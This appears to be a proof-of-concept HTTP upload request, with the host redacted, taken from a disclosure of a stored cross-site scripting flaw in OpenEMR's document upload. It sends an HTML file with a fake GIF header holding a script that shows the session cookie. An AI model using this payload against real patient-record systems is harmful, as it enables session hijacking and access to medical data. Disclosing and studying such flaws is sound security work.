POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
Host: REDACTED
(…snip…)
Upgrade-Insecure-Requests: 1
—————————–139184551113566022282519832587
Content-Disposition: form-data; name=”MAX_FILE_SIZE”
64000000
—————————–139184551113566022282519832587
Content-Disposition: form-data; name=”file[]”; filename=”1111.txt”
Content-Type: text/html
GIF89<script>alert(document.cookie);</script>
—————————–139184551113566022282519832587
Content-Disposition: form-data; name=”dicom_folder[]”; filename=””
Content-Type: application/octet-stream
(…snip…)
—————————–139184551113566022282519832587–